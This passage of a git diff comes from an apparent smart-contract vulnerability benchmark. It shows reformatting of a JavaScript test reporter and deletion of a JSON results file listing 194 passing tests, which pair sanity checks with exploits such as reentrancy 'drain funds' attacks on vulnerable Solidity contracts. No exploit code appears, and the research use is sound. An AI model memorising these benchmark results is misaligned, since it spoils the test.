allFiles - passingFiles; + const failedFiles = allFiles - passingFiles; - const formattedMessage = Base.color('green', `Total passing test files: ${passingFiles}/${allFiles}`); - const formattedMessage2 = Base.color('fail', `Total failed files: ${failedFiles}/${allFiles}`); - const formattedMessage3 = Base.color('fail', `Total failed sanity tests: ${failedSanity}/${allFiles}`); - // // Log the formatted message - console.log(`${formattedMessage}`); - console.log(`${formattedMessage2}`); - console.log(`${formattedMessage3}`); + const formattedMessage = Base.color( + "green", + `Total passing test files: ${passingFiles}/${allFiles}`, + ); + const formattedMessage2 = Base.color( + "fail", + `Total failed files: ${failedFiles}/${allFiles}`, + ); + const formattedMessage3 = Base.color( + "fail", + `Total failed sanity tests: ${failedSanity}/${allFiles}`, + ); + // // Log the formatted message + console.log(`${formattedMessage}`); + console.log(`${formattedMessage2}`); + console.log(`${formattedMessage3}`); - if (exportToJson) { - // Prepare the data to be exported to JSON - const results = { - totalTests: tests, - passingTests: passes, - failingTests: failures, - totalFiles: allFiles, - passingFiles: passingFiles, - failingFiles: failedFiles, - failedSanity: failedSanity, - passedSanity: passedSanity, - failedSanityTests: failedSanityTests, - passedResults: passedResults, - failedResults: failedResults, - }; + if (exportToJson) { + // Prepare the data to be exported to JSON + const results = { + totalTests: tests, + passingTests: passes, + failingTests: failures, + totalFiles: allFiles, + passingFiles: passingFiles, + failingFiles: failedFiles, + failedSanity: failedSanity, + passedSanity: passedSanity, + failedSanityTests: failedSanityTests, + passedResults: passedResults, + failedResults: failedResults, + }; - // Write to JSON file - const jsonPath = path.join(__dirname, 'test-results.json'); - fs.writeFileSync(jsonPath, JSON.stringify(results, null, 2)); - console.log(`\nTest results written to ${jsonPath}`); - } + // Write to JSON file + const jsonPath = path.join(__dirname, "test-results.json"); + fs.writeFileSync(jsonPath, JSON.stringify(results, null, 2)); + console.log(`\nTest results written to ${jsonPath}`); + } }); } } diff --git a/smartbugs-curated/0.4.x/scripts/test-results.json b/smartbugs-curated/0.4.x/scripts/test-results.json deleted file mode 100644 index 0ba6efd..0000000 --- a/smartbugs-curated/0.4.x/scripts/test-results.json +++ /dev/null @@ -1,1174 +0,0 @@ -{ - "totalTests": 194, - "passingTests": 194, - "failingTests": 0, - "totalFiles": 91, - "passingFiles": 91, - "failingFiles": 0, - "testResults": [ - { - "title": "sanity check: access_control/FibonacciBalance.sol", - "file": "access_control/FibonacciBalance_test.js", - "contractFile": "access_control/FibonacciBalance.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/FibonacciBalance_test.js", - "contractFile": "access_control/FibonacciBalance.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/arbitrary_location_write_simple.sol", - "file": "access_control/arbitrary_location_write_simple_test.js", - "contractFile": "access_control/arbitrary_location_write_simple.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/arbitrary_location_write_simple_test.js", - "contractFile": "access_control/arbitrary_location_write_simple.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/incorrect_constructor_name1.sol", - "file": "access_control/incorrect_constructor_name1_test.js", - "contractFile": "access_control/incorrect_constructor_name1.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/incorrect_constructor_name1_test.js", - "contractFile": "access_control/incorrect_constructor_name1.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/incorrect_constructor_name2.sol", - "file": "access_control/incorrect_constructor_name2_test.js", - "contractFile": "access_control/incorrect_constructor_name2.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/incorrect_constructor_name2_test.js", - "contractFile": "access_control/incorrect_constructor_name2.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/incorrect_constructor_name3.sol", - "file": "access_control/incorrect_constructor_name3_test.js", - "contractFile": "access_control/incorrect_constructor_name3.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/incorrect_constructor_name3_test.js", - "contractFile": "access_control/incorrect_constructor_name3.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/mapping_write.sol", - "file": "access_control/mapping_write_test.js", - "contractFile": "access_control/mapping_write.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/mapping_write_test.js", - "contractFile": "access_control/mapping_write.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/multiowned_vulnerable.sol", - "file": "access_control/multiowned_vulnerable_test.js", - "contractFile": "access_control/multiowned_vulnerable.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/multiowned_vulnerable_test.js", - "contractFile": "access_control/multiowned_vulnerable.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/mycontract.sol", - "file": "access_control/mycontract_test.js", - "contractFile": "access_control/mycontract.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/mycontract_test.js", - "contractFile": "access_control/mycontract.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/parity_wallet_bug_2.sol", - "file": "access_control/parity_wallet_bug_2_test.js", - "contractFile": "access_control/parity_wallet_bug_2.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/parity_wallet_bug_2_test.js", - "contractFile": "access_control/parity_wallet_bug_2.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/phishable.sol", - "file": "access_control/phishable_test.js", - "contractFile": "access_control/phishable.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/phishable_test.js", - "contractFile": "access_control/phishable.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/proxy.sol", - "file": "access_control/proxy_test.js", - "contractFile": "access_control/proxy.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/proxy_test.js", - "contractFile": "access_control/proxy.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/unprotected0.sol", - "file": "access_control/simple_suicide_test.js", - "contractFile": "access_control/simple_suicide.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/simple_suicide_test.js", - "contractFile": "access_control/simple_suicide.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/unprotected0.sol", - "file": "access_control/unprotected0_test.js", - "contractFile": "access_control/unprotected0.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/unprotected0_test.js", - "contractFile": "access_control/unprotected0.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/wallet_02_refund_nosub.sol", - "file": "access_control/wallet_02_refund_nosub_test.js", - "contractFile": "access_control/wallet_02_refund_nosub.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/wallet_02_refund_nosub_test.js", - "contractFile": "access_control/wallet_02_refund_nosub.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/wallet_03_wrong_constructor.sol", - "file": "access_control/wallet_03_wrong_constructor_test.js", - "contractFile": "access_control/wallet_03_wrong_constructor.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/wallet_03_wrong_constructor_test.js", - "contractFile": "access_control/wallet_03_wrong_constructor.sol", - "state": "passed" - }, - { - "title": "sanity check: access_control/wallet_04_confused_sign.sol", - "file": "access_control/wallet_04_confused_sign_test.js", - "contractFile": "access_control/wallet_04_confused_sign.sol", - "state": "passed" - }, - { - "title": "exploit access control vulnerability", - "file": "access_control/wallet_04_confused_sign_test.js", - "contractFile": "access_control/wallet_04_confused_sign.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/BECToken.sol", - "file": "arithmetic/BECToken_test.js", - "contractFile": "arithmetic/BECToken.sol", - "state": "passed" - }, - { - "title": "exploit overflow vulnerability", - "file": "arithmetic/BECToken_test.js", - "contractFile": "arithmetic/BECToken.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_add.sol", - "file": "arithmetic/integer_overflow_add_test.js", - "contractFile": "arithmetic/integer_overflow_add.sol", - "state": "passed" - }, - { - "title": "exploit overflow vulnerability", - "file": "arithmetic/integer_overflow_add_test.js", - "contractFile": "arithmetic/integer_overflow_add.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_benign_1.sol", - "file": "arithmetic/integer_overflow_benign_1_test.js", - "contractFile": "arithmetic/integer_overflow_benign_1.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/integer_overflow_benign_1_test.js", - "contractFile": "arithmetic/integer_overflow_benign_1.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_benign_1.sol", - "file": "arithmetic/integer_overflow_minimal_test.js", - "contractFile": "arithmetic/integer_overflow_minimal.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/integer_overflow_minimal_test.js", - "contractFile": "arithmetic/integer_overflow_minimal.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_mul.sol", - "file": "arithmetic/integer_overflow_mul_test.js", - "contractFile": "arithmetic/integer_overflow_mul.sol", - "state": "passed" - }, - { - "title": "exploit overflow vulnerability", - "file": "arithmetic/integer_overflow_mul_test.js", - "contractFile": "arithmetic/integer_overflow_mul.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_multitx_multifunc_feasible.sol", - "file": "arithmetic/integer_overflow_multitx_multifunc_feasible_test.js", - "contractFile": "arithmetic/integer_overflow_multitx_multifunc_feasible.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/integer_overflow_multitx_multifunc_feasible_test.js", - "contractFile": "arithmetic/integer_overflow_multitx_multifunc_feasible.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/integer_overflow_multitx_onefunc_feasible.sol", - "file": "arithmetic/integer_overflow_multitx_onefunc_feasible_test.js", - "contractFile": "arithmetic/integer_overflow_multitx_onefunc_feasible.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/integer_overflow_multitx_onefunc_feasible_test.js", - "contractFile": "arithmetic/integer_overflow_multitx_onefunc_feasible.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/overflow_simple_add.sol", - "file": "arithmetic/overflow_simple_add_test.js", - "contractFile": "arithmetic/overflow_simple_add.sol", - "state": "passed" - }, - { - "title": "exploit overflow vulnerability", - "file": "arithmetic/overflow_simple_add_test.js", - "contractFile": "arithmetic/overflow_simple_add.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/overflow_single_tx.sol", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit overflow add vulnerability", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit overflow mul vulnerability", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit overflow add vulnerability locally", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit overflow mul vulnerability locally", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability locally", - "file": "arithmetic/overflow_single_tx_test.js", - "contractFile": "arithmetic/overflow_single_tx.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/timeLock.sol", - "file": "arithmetic/timelock_test.js", - "contractFile": "arithmetic/timelock.sol", - "state": "passed" - }, - { - "title": "exploit overflow vulnerability", - "file": "arithmetic/timelock_test.js", - "contractFile": "arithmetic/timelock.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/token.sol", - "file": "arithmetic/token_test.js", - "contractFile": "arithmetic/token.sol", - "state": "passed" - }, - { - "title": "exploit underflow vulnerability", - "file": "arithmetic/token_test.js", - "contractFile": "arithmetic/token.sol", - "state": "passed" - }, - { - "title": "sanity check: arithmetic/tokensalechallenge.sol", - "file": "arithmetic/tokensalechallenge_test.js", - "contractFile": "arithmetic/tokensalechallenge.sol", - "state": "passed" - }, - { - "title": "exploit buy overflow vulnerability line 23", - "file": "arithmetic/tokensalechallenge_test.js", - "contractFile": "arithmetic/tokensalechallenge.sol", - "state": "passed" - }, - { - "title": "exploit the catch the ether vulnerability", - "file": "arithmetic/tokensalechallenge_test.js", - "contractFile": "arithmetic/tokensalechallenge.sol", - "state": "passed" - }, - { - "title": "sanity check: bad_randomness/blackjack.sol", - "file": "bad_randomness/blackjack_test.js", - "contractFile": "bad_randomness/blackjack.sol", - "state": "passed" - }, - { - "title": "exploit bad randomness vulnerability", - "file": "bad_randomness/blackjack_test.js", - "contractFile": "bad_randomness/blackjack.sol", - "state": "passed" - }, - { - "title": "sanity check: bad_randomness/etheraffle.sol", - "file": "bad_randomness/etheraffle_test.js", - "contractFile": "bad_randomness/etheraffle.sol", - "state": "passed" - }, - { - "title": "exploit bad randomness vulnerability", - "file": "bad_randomness/etheraffle_test.js", - "contractFile": "bad_randomness/etheraffle.sol", - "state": "passed" - }, - { - "title": "sanity check: bad_randomness/guess_the_random_number.sol", - "file": "bad_randomness/guess_the_random_number_test.js", - "contractFile": "bad_randomness/guess_the_random_number.sol", - "state": "passed" - }, - { - "title": "exploit bad randomness vulnerability", - "file": "bad_randomness/guess_the_random_number_test.js", - "contractFile": "bad_randomness/guess_the_random_number.sol", - "state": "passed" - }, - { - "title": "sanity check: bad_randomness/old_blockhash.sol", - "file": "bad_randomness/old_blockhash_test.js", - "contractFile": "bad_randomness/old_blockhash.sol", - "state": "passed" - }, - { - "title": "exploit bad randomness vulnerability", - "file": "bad_randomness/old_blockhash_test.js", - "contractFile": "bad_randomness/old_blockhash.sol", - "state": "passed" - }, - { - "title": "sanity check: denial_of_service/auction.sol", - "file": "denial_of_service/auction_test.js", - "contractFile": "denial_of_service/auction.sol", - "state": "passed" - }, - { - "title": "exploit denial of service vulnerability", - "file": "denial_of_service/auction_test.js", - "contractFile": "denial_of_service/auction.sol", - "state": "passed" - }, - { - "title": "sanity check: denial_of_service/dos_address.sol", - "file": "denial_of_service/dos_address_test.js", - "contractFile": "denial_of_service/dos_address.sol", - "state": "passed" - }, - { - "title": "exploit denial of service vulnerability", - "file": "denial_of_service/dos_address_test.js", - "contractFile": "denial_of_service/dos_address.sol", - "state": "passed" - }, - { - "title": "sanity check: denial_of_service/dos_number.sol", - "file": "denial_of_service/dos_number_test.js", - "contractFile": "denial_of_service/dos_number.sol", - "state": "passed" - }, - { - "title": "exploit denial of service vulnerability", - "file": "denial_of_service/dos_number_test.js", - "contractFile": "denial_of_service/dos_number.sol", - "state": "passed" - }, - { - "title": "sanity check: denial_of_service/dos_simple.sol", - "file": "denial_of_service/dos_simple_test.js", - "contractFile": "denial_of_service/dos_simple.sol", - "state": "passed" - }, - { - "title": "exploit denial of service vulnerability", - "file": "denial_of_service/dos_simple_test.js", - "contractFile": "denial_of_service/dos_simple.sol", - "state": "passed" - }, - { - "title": "sanity check: front_running/ERC20.sol", - "file": "front_running/ERC20_test.js", - "contractFile": "front_running/ERC20.sol", - "state": "passed" - }, - { - "title": "front running vulnerability", - "file": "front_running/ERC20_test.js", - "contractFile": "front_running/ERC20.sol", - "state": "passed" - }, - { - "title": "sanity check: front_running/eth_tx_order_dependence_minimal.sol", - "file": "front_running/eth_tx_order_dependence_minimal_test.js", - "contractFile": "front_running/eth_tx_order_dependence_minimal.sol", - "state": "passed" - }, - { - "title": "front running vulnerability in setReward() function", - "file": "front_running/eth_tx_order_dependence_minimal_test.js", - "contractFile": "front_running/eth_tx_order_dependence_minimal.sol", - "state": "passed" - }, - { - "title": "front running vulnerability in claimReward() function", - "file": "front_running/eth_tx_order_dependence_minimal_test.js", - "contractFile": "front_running/eth_tx_order_dependence_minimal.sol", - "state": "passed" - }, - { - "title": "sanity check: front_running/odds_and_evens.sol", - "file": "front_running/odds_and_evens_test.js", - "contractFile": "front_running/odds_and_evens.sol", - "state": "passed" - }, - { - "title": "front running vulnerability", - "file": "front_running/odds_and_evens_test.js", - "contractFile": "front_running/odds_and_evens.sol", - "state": "passed" - }, - { - "title": "sanity check: other/crypto_roulette.sol", - "file": "other/crypto_roulette_test.js", - "contractFile": "other/crypto_roulette.sol", - "state": "passed" - }, - { - "title": "exploit uninitialized storage vulnerability", - "file": "other/crypto_roulette_test.js", - "contractFile": "other/crypto_roulette.sol", - "state": "passed" - }, - { - "title": "sanity check: other/name_registrar.sol", - "file": "other/name_registrar_test.js", - "contractFile": "other/name_registrar.sol", - "state": "passed" - }, - { - "title": "exploit uninitialized storage vulnerability", - "file": "other/name_registrar_test.js", - "contractFile": "other/name_registrar.sol", - "state": "passed" - }, - { - "title": "sanity check: other/open_address_lottery.sol", - "file": "other/open_address_lottery_test.js", - "contractFile": "other/open_address_lottery.sol", - "state": "passed" - }, - { - "title": "exploit uninitialized storage vulnerability", - "file": "other/open_address_lottery_test.js", - "contractFile": "other/open_address_lottery.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", - "file": "reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js", - "contractFile": "reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f_test.js", - "contractFile": "reentrancy/0x01f8c4e3fa3edeb29e514cba738d87ce8c091d3f.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", - "file": "reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js", - "contractFile": "reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4_test.js", - "contractFile": "reentrancy/0x23a91059fdc9579a9fbd0edc5f2ea0bfdb70deb4.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", - "file": "reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js", - "contractFile": "reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1_test.js", - "contractFile": "reentrancy/0x4320e6f8c05b27ab4707cd1f6d5ce6f3e4b3a5a1.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", - "file": "reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js", - "contractFile": "reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106_test.js", - "contractFile": "reentrancy/0x4e73b32ed6c35f570686b89848e5f39f20ecc106.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol", - "file": "reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js", - "contractFile": "reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31_test.js", - "contractFile": "reentrancy/0x561eac93c92360949ab1f1403323e6db345cbf31.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol", - "file": "reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js", - "contractFile": "reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615_test.js", - "contractFile": "reentrancy/0x7541b76cb60f4c60af330c208b0623b7f54bf615.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", - "file": "reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js", - "contractFile": "reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782_test.js", - "contractFile": "reentrancy/0x7a8721a9d64c74da899424c1b52acbf58ddc9782.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol", - "file": "reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js", - "contractFile": "reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3_test.js", - "contractFile": "reentrancy/0x7b368c4e805c3870b6c49a3f1f49f69af8662cf3.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol", - "file": "reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js", - "contractFile": "reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344_test.js", - "contractFile": "reentrancy/0x8c7777c45481dba411450c228cb692ac3d550344.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", - "file": "reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js", - "contractFile": "reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5_test.js", - "contractFile": "reentrancy/0x93c32845fae42c83a70e5f06214c8433665c2ab5.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", - "file": "reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js", - "contractFile": "reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e_test.js", - "contractFile": "reentrancy/0x941d225236464a25eb18076df7da6a91d0f95e9e.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", - "file": "reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js", - "contractFile": "reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b_test.js", - "contractFile": "reentrancy/0x96edbe868531bd23a6c05e9d0c424ea64fb1b78b.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", - "file": "reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js", - "contractFile": "reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8_test.js", - "contractFile": "reentrancy/0xaae1f51cf3339f18b6d3f3bdc75a5facd744b0b8.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", - "file": "reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js", - "contractFile": "reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12_test.js", - "contractFile": "reentrancy/0xb5e1b1ee15c6fa0e48fce100125569d430f1bd12.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", - "file": "reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js", - "contractFile": "reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e_test.js", - "contractFile": "reentrancy/0xb93430ce38ac4a6bb47fb1fc085ea669353fd89e.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", - "file": "reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js", - "contractFile": "reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f_test.js", - "contractFile": "reentrancy/0xbaf51e761510c1a11bf48dd87c0307ac8a8c8a4f.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol", - "file": "reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js", - "contractFile": "reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888_test.js", - "contractFile": "reentrancy/0xbe4041d55db380c5ae9d4a9b9703f1ed4e7e3888.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol", - "file": "reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js", - "contractFile": "reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e_test.js", - "contractFile": "reentrancy/0xcead721ef5b11f1a7b530171aab69b16c5e66b6e.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol", - "file": "reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js", - "contractFile": "reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68_test.js", - "contractFile": "reentrancy/0xf015c35649c82f5467c9c74b7f28ee67665aad68.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/etherstore.sol", - "file": "reentrancy/etherstore_test.js", - "contractFile": "reentrancy/etherstore.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/etherstore_test.js", - "contractFile": "reentrancy/etherstore.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/modifier_reentrancy.sol", - "file": "reentrancy/modifier_reentrancy_test.js", - "contractFile": "reentrancy/modifier_reentrancy.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/modifier_reentrancy_test.js", - "contractFile": "reentrancy/modifier_reentrancy.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/reentrance.sol", - "file": "reentrancy/reentrance_test.js", - "contractFile": "reentrancy/reentrance.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/reentrance_test.js", - "contractFile": "reentrancy/reentrance.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/reentrancy_bonus.sol", - "file": "reentrancy/reentrancy_bonus_test.js", - "contractFile": "reentrancy/reentrancy_bonus.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/reentrancy_bonus_test.js", - "contractFile": "reentrancy/reentrancy_bonus.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/reentrancy_dao.sol", - "file": "reentrancy/reentrancy_dao_test.js", - "contractFile": "reentrancy/reentrancy_dao.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/reentrancy_dao_test.js", - "contractFile": "reentrancy/reentrancy_dao.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/reentrancy_simple.sol", - "file": "reentrancy/reentrancy_simple_test.js", - "contractFile": "reentrancy/reentrancy_simple.sol", - "state": "passed" - }, - { - "title": "should successfully drain 